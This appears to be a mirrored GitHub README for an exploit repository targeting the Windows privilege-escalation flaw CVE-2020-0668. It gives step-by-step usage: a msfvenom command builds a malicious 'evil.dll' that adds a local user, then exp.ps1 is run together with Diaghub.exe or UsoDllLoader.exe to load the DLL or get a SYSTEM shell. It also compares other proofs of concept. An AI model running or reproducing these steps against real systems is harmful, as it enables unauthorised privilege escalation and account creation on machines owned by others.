ycdxsb / CVE-2020-0668

Make CVE-2020-0668 exploit work for version < win10 v1903 and version >= win10 v1903

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2020-0668

Make CVE-2020-0668 exploit work for version < win10 v1903 and version >= win10 v1903

Diaghub Exploit (< v1903)

powershell exploit works on version < win10 v1903 with Diaghub.

Usage

  • STEP 1:generate evil.dll with msfvenom
    • example add a user : msfvenom -p windows/x64/exec CMD="net user test test /add" -f dll > evil.dll
  • STEP 2:execute exp.ps1 with powershell
  • STEP 3:execute Diaghub.exe C:\ProgramData evil.dll to load dll and add user.

Diaghub

UsoDllLoader Exploit (>= v1903)

powershell exploit works on version >= win10 v1903 with UsoDllLoader.

Usage

  • STEP 1 : execute exp.ps1 with powershell
  • STEP 2 : execute UsoDllLoader.exe to get a system shell

exploit

Other Exp or PoC

SysTracingPoc Exp

A x86 release version of SysTracingPoc for issue,exploit works on version >= win10 v1903 because of UsoLoadDll.

RedCursorSecurityConsulting PoC

A .net PoC. If you take a look at C:\Windows\System32\evil.dll and rename it as evil.txt.

You will find it not a dll file. Only tracing log in it.

Nan3r PoC

A powershell PoC. Also only tracing log in evil.dll.

About

Make CVE-2020-0668 exploit work for version < win10 v1903 and version >= win10 v1903


Languages

Language:C++ 93.8%Language:C 3.2%Language:PowerShell 3.1%